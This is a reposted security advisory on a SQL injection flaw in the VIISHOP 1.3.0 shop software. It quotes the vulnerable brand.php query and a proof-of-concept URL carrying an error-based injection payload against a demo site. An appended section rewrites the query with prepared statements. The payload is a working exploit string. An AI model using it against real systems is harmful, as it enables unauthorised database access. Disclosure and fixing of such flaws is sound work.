
VIISHOP 1.3.0 SQL Injection and Fix

Source: Internet   Author: Anonymous   Time: 2016-05-07 10:05
/*******************************************************/
/* VIISHOP 1.3.0 SQL Injection Vulnerability
/* ========================
/* By     : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
/* Welcome to http://www.90sec.com */
/*******************************************************/

//index.php (front page file)
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : "";
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
    $GLOBALS['_REQUEST']['p'] = "index";
}
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] );
$inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc );
if ( !include( "system/{$inc}.php" ) )  // the include target is filtered, so look at the files under the system directory
{
    show_msg( "error_once", "index.php" );
}



The problem is in the brand.php file:


$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) );  // $prefix and $brand_id are never initialised and go into the query without any filtering



PoC: http://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29
Fix:

Recommended: the 80sec anti-injection code, hahaha
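As an added example (not code from the advisory or from VIISHOP), the brand.php query rebuilt in two forms: the interpolated string the advisory quotes, and a hardened version that takes the table prefix from configuration and binds uid as an integer through a mysqli prepared statement. The function names, the mysqli connection and the column layout are assumptions.

```php
<?php
// Added example, not from the advisory or from VIISHOP itself. Function
// names, the mysqli connection and the column layout are assumptions.

// The pattern the advisory quotes: $prefix and $brand_id are never
// initialised in brand.php, so with register_globals-style request import
// both arrive from the client and are spliced into the SQL text verbatim.
function brand_query_unsafe(string $prefix, string $brand_id): string
{
    return "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'";
}

// Hardened version: the prefix is a configuration value checked against a
// strict identifier whitelist (it cannot be bound as a parameter), and uid
// must be a positive integer that is sent as a bound parameter, so client
// input can never alter the structure of the statement.
function fetch_brand(mysqli $db, string $prefix, $brand_id): ?array
{
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $id = filter_var($brand_id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;   // non-integer input is rejected before any query is issued
    }
    $stmt = $db->prepare("SELECT * FROM {$prefix}brand WHERE uid = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Constructed input standing in for a request value. A single stray quote
// is enough to break out of the string literal in the unsafe builder,
// while fetch_brand() rejects it in the integer check without touching the DB.
$untrusted = "1'";
echo brand_query_unsafe('vii_', $untrusted), PHP_EOL;
```

The same validate-then-bind pattern applies to every request-derived value in the system/ scripts; a generic "anti-injection" filter on $_REQUEST only masks the underlying lack of parameterisation.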
 